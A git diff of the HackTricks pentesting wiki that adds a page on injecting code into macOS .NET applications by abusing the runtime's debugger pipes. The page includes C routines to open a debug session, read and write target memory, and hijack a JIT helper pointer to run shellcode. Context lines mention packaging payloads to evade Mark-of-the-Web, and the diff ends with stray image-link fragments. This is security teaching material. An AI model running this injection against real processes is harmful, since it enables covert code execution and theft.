diff --git a/.gitbook/assets/image (1) (3) (3).png b/.gitbook/assets/image (1) (3) (3).png
new file mode 100644
index 000000000..9b4be1f50
Binary files /dev/null and b/.gitbook/assets/image (1) (3) (3).png differ
diff --git a/.gitbook/assets/image (1) (3).png b/.gitbook/assets/image (1) (3).png
index 9b4be1f50..248451f19 100644
Binary files a/.gitbook/assets/image (1) (3).png and b/.gitbook/assets/image (1) (3).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index 248451f19..2173ed0a4 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (12) (2) (2).png b/.gitbook/assets/image (12) (2) (2).png
new file mode 100644
index 000000000..9071ce02e
Binary files /dev/null and b/.gitbook/assets/image (12) (2) (2).png differ
diff --git a/.gitbook/assets/image (12) (2).png b/.gitbook/assets/image (12) (2).png
index 9071ce02e..1a73a04a7 100644
Binary files a/.gitbook/assets/image (12) (2).png and b/.gitbook/assets/image (12) (2).png differ
diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png
index 1a73a04a7..218780f03 100644
Binary files a/.gitbook/assets/image (12).png and b/.gitbook/assets/image (12).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 218780f03..8eae14f0f 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index 917a322f1..f57f8149d 100644
--- a/README.md
+++ b/README.md
@@ -36,7 +36,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [RootedCON](https://www.rootedcon.com/)
-
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
diff --git a/SUMMARY.md b/SUMMARY.md
index ecbc38b6c..51e86cc75 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -163,6 +163,7 @@
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
* [macOS Electron Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
+ * [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 7b807d865..ac0f85ebb 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -211,7 +211,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
-
+
## References
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 6a0f569b2..ff74d08b8 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -16,7 +16,7 @@
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
-
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
index 1d26680ae..55e9b6cde 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
@@ -50,7 +50,7 @@ DMG files, or Apple Disk Images, are a file format used by Apple's macOS for dis
### Hierarchy
-
+
The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
index 11986eaee..662b4cc94 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
@@ -48,6 +48,14 @@ Electron applications executed with specific env variables could be vulnerable t
[macos-electron-applications-injection.md](macos-electron-applications-injection.md)
{% endcontent-ref %}
+### .Net Applications Injection
+
+It's possible to inject code into .Net applications by **abusing the .Net debugging functionality** (not protected by macOS protections such as runtim hardening).
+
+{% content-ref url="macos-.net-applications-injection.md" %}
+[macos-.net-applications-injection.md](macos-.net-applications-injection.md)
+{% endcontent-ref %}
+
## Detection
### Shield
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
new file mode 100644
index 000000000..d9b9ccbc9
--- /dev/null
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -0,0 +1,214 @@
+# macOS .Net Applications Injection
+
+
+
+☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
+
+## .NET Core Debugging
+
+### **Stablish a debugging session**
+
+[**dbgtransportsession.cpp**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp) is responsible for handling debugger to debugee **communication**.\
+It creates a 2 of names pipes per .Net process in [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127) by calling [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27) (one will end in **`-in`** and the other in **`-out`** and the rest of the name will be the same).
+
+So, if you go to the users **`$TMPDIR`** you will be able to find **debugging fifos** you could use to debug .Net applications:
+
+
+
+The function [**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) will handle the communication from a debugger.
+
+The first thing a debugger is required to do is to **create a new debugging session**. This is done by **sending a message via the `out` pipe** beginning with a `MessageHeader` struct, which we can grab from the .NET source:
+
+```c
+struct MessageHeader
+{
+ MessageType m_eType; // Type of message this is
+ DWORD m_cbDataBlock; // Size of data block that immediately follows this header (can be zero)
+ DWORD m_dwId; // Message ID assigned by the sender of this message
+ DWORD m_dwReplyId; // Message ID that this is a reply to (used by messages such as MT_GetDCB)
+ DWORD m_dwLastSeenId; // Message ID last seen by sender (receiver can discard up to here from send queue)
+ DWORD m_dwReserved; // Reserved for future expansion (must be initialized to zero and
+ // never read)
+ union {
+ struct {
+ DWORD m_dwMajorVersion; // Protocol version requested/accepted
+ DWORD m_dwMinorVersion;
+ } VersionInfo;
+ ...
+ } TypeSpecificData;
+
+ BYTE m_sMustBeZero[8];
+}
+```
+
+In the case of a new session request, this struct is populated as follows:
+
+```c
+static const DWORD kCurrentMajorVersion = 2;
+static const DWORD kCurrentMinorVersion = 0;
+
+// Set the message type (in this case, we're establishing a session)
+sSendHeader.m_eType = MT_SessionRequest;
+
+// Set the version
+sSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion;
+sSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;
+
+// Finally set the number of bytes which follow this header
+sSendHeader.m_cbDataBlock = sizeof(SessionRequestData);
+```
+
+Once constructed, we **send this over to the target** using the `write` syscall:
+
+```c
+write(wr, &sSendHeader, sizeof(MessageHeader));
+```
+
+Following our header, we need to send over a `sessionRequestData` struct, which contains a GUID to identify our session:
+
+```c
+// All '9' is a GUID.. right??
+memset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData));
+
+// Send over the session request data
+write(wr, &sDataBlock, sizeof(SessionRequestData));
+```
+
+Upon sending over our session request, we **read from the `out` pipe a header** that will indicate **if** our request to establish whether a debugger session has been **successful** or not:
+
+```c
+read(rd, &sReceiveHeader, sizeof(MessageHeader));
+```
+
+### Read Memory
+
+With a debugging sessions stablished it's possible to **read memory** using the message type [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). To read some memory the main code needed would be:
+
+```c
+bool readMemory(void *addr, int len, unsigned char **output) {
+
+ *output = (unsigned char *)malloc(len);
+ if (*output == NULL) {
+ return false;
+ }
+
+ sSendHeader.m_dwId++; // We increment this for each request
+ sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; // This needs to be set to the ID of our previous response
+ sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; // Similar to above, this indicates which ID we are responding to
+ sSendHeader.m_eType = MT_ReadMemory; // The type of request we are making
+ sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; // Address to read from
+ sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len; // Number of bytes to write
+ sSendHeader.m_cbDataBlock = 0;
+
+ // Write the header
+ if (write(wr, &sSendHeader, sizeof(sSendHeader)) < 0) {
+ return false;
+ }
+
+ // Read the response header
+ if (read(rd, &sReceiveHeader, sizeof(sSendHeader)) < 0) {
+ return false;
+ }
+
+ // Make sure that memory could be read before we attempt to read further
+ if (sReceiveHeader.TypeSpecificData.MemoryAccess.m_hrResult != 0) {
+ return false;
+ }
+
+ memset(*output, 0, len);
+
+ // Read the memory from the debugee
+ if (read(rd, *output, sReceiveHeader.m_cbDataBlock) < 0) {
+ return false;
+ }
+
+ return true;
+}
+```
+
+The proof of concept (POC) code found [here](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
+
+### Write memory
+
+```c
+bool writeMemory(void *addr, int len, unsigned char *input) {
+
+ sSendHeader.m_dwId++; // We increment this for each request
+ sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; // This needs to be set to the ID of our previous response
+ sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; // Similar to above, this indicates which ID we are responding to
+ sSendHeader.m_eType = MT_WriteMemory; // The type of request we are making
+ sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; // Address to write to
+ sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len; // Number of bytes to write
+ sSendHeader.m_cbDataBlock = len;
+
+ // Write the header
+ if (write(wr, &sSendHeader, sizeof(sSendHeader)) < 0) {
+ return false;
+ }
+
+ // Write the data
+ if (write(wr, input, len) < 0) {
+ return false;
+ }
+
+ // Read the response header
+ if (read(rd, &sReceiveHeader, sizeof(sSendHeader)) < 0) {
+ return false;
+ }
+
+ // Ensure our memory write was successful
+ if (sReceiveHeader.TypeSpecificData.MemoryAccess.m_hrResult != 0) {
+ return false;
+ }
+
+ return true;
+
+}
+```
+
+The POC code used to do this can be found [here](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).
+
+### .NET Core Code execution
+
+The first thing is to identify for example a memory region with **`rwx`** running to save the shellcode to run. This can be easily done with:
+
+```bash
+vmmap -pages [pid]
+vmmap -pages 35829 | grep "rwx/rwx"
+```
+
+Then in order to trigger the execution it would be needed to know some place where a function pointer is stored to overwrite it. It's possible to overwrite a pointer within the **Dynamic Function Table (DFT)**, which is used by the .NET Core runtime to provide helper functions for JIT compilation. A list of supported function pointers can be found within [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h).
+
+In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
+
+
+
+All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
+
+Knowing this address it's possible to overwrite the function pointer with our shellcodes one.
+
+The full POC code used to inject into PowerShell can be found [here](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).
+
+## References
+
+* This technique was taken from [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/)
+
+
+
+☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index e60b7ca2e..5bdda94ee 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -12,7 +12,7 @@
-
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index b7abef230..8c250dccf 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -259,7 +259,7 @@ It's important to note that executables signed with a **trusted** signing certif
A very effective way to prevent your payloads from getting the Mark of The Web is by packaging them inside some sort of container like an ISO. This happens because Mark-of-the-Web (MOTW) **cannot** be applied to **non NTFS** volumes.
-
+
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) is a tool that packages payloads into output containers to evade Mark-of-the-Web.
 (3).png)
 (3) (3).png)
.png)
.png)
 (3).png)
.png)
 (2).png)
 (3).png)
 (3) (3).png)
 (2).png)
 (2) (2).png)